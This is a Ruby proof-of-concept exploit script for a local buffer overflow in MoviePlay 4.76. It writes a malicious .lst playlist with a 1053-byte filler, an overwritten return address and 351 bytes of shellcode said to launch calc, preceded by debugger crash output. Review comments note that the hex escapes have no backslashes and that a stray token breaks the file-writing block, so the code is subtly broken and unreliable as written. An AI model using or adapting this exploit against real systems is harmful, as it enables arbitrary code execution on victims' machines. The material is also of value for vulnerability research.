#!/usr/bin/env ruby
###################
#MoviePlay 4.76 .lst file local buffer overflow.
#Credit to n00b for writing poc code..Pmsl
#Tested on :Win xp sp2 eng.
#Vendor web site: Netfarer.com MoviePlay 4.76
#Buffer-over flow reported : Jan 02 2007 12:00AM
#Credit goes to Parvez Anwar for finding the bug.
#################################################################################
#MoviePlay is prone to a remote buffer-overflow vulnerability because it
#fails to properly bounds-check user-supplied input before copying it to
#an insufficiently sized memory buffer. Exploiting this vulnerability
#allows attackers to execute arbitrary machine code in the context of
#the affected application.
#I looked all over for PoC code, or even something to back the claim up,
#and nothing was found.
#Since I was bored, I decided to write a PoC for this.
#After 1053 bytes, the next 4 bytes overwrite EIP; ESP was then pointing
#4 bytes after that, so no NOP sled or anything else was needed.
#1053 bytes of buffer --> 4 bytes ret --> 351 bytes shellcode --> 592 bytes of buffer.
#The file is 2000 bytes.
#################################################################################
# ..\Debug info//..
#(664.3b0): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=ffffffff ebx=00000000 ecx=41414141 edx=0048ef90 esi=00b00048 edi=00000001
#eip=41414141 esp=0012ec78 ebp=41414141 iopl=0 nv up ei ng nz ac pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010296
#41414141 ?? ???
#################################################################################
#Shouts: - Str0ke - Marsu - SM - vade79 - c0ntex - Kevin Finisterre
#################################################################################
# Assembles a MoviePlay .lst playlist whose FileName0 entry is oversized and
# writes it to "Exploit.lst" in the current working directory. The script only
# concatenates string literals and writes one file; nothing is executed here.
# NOTE(review): as pasted, the hex escapes below carry no backslash, so Ruby
# treats "x5b" etc. as plain ASCII text rather than single bytes; the byte
# counts quoted in the header comments assume real byte escapes.
# Hex-escaped INI-style .lst header: "[MoviePlay]" CRLF "FileName0=C:\".
Header1 = "x5bx4dx6fx76x69x65x50x6cx61x79x5dx0dx0ax46x69x6c"+
"x65x4ex61x6dx65x30x3dx43x3ax5c"
bof1 = 'A'* 1053 # filler; per the author's notes 1053 bytes precede the saved return address
ret = "x45x15xF6x77" # value written over EIP; the author's note cites call esp in Shlwapi.dll at 0x77F61545 (XP SP2 English)
# 351-byte payload; the author's note says it launches calc.
shell =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+ # 351 bytes in total across the lines below
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"+
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"+
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"+
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"+
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"+
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"+
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"+
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"+
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"+
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"+
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"+
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"+
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"+
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"+
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"+
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"+
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a"
bof2 = 'B'* 592 # trailing filler so the file body reaches the 2000 bytes described above
# Hex-escaped remainder of the playlist: ".mp3" CRLF "FileName1=" CRLF "NumFiles=1" CRLF.
Header2 = "x2ex6d"+
"x70x33x0dx0ax46x69x6cx65x4ex61x6dx65x31x3dx0dx0a"+
"x4ex75x6dx46x69x6cx65x73x3dx31x0dx0a"
# File body, in order: header, filler, return value, payload, filler, trailer.
lst_file = Header1 + bof1 + ret + shell + bof2 + Header2
# Write the assembled content to Exploit.lst (overwrites an existing file of that name).
File.open( "Exploit.lst","w") do |the_file| #Write
file # NOTE(review): stray token from a broken line wrap; the comment above appears to have read "#Write file". As written this is a call to an undefined method.
the_file.puts (lst_file) # puts appends a newline, so the file is one byte longer than lst_file; the space before "(" triggers a Ruby warning
the_file.close # redundant: File.open with a block closes the handle when the block ends
print 'File was created success-fully..!!'
end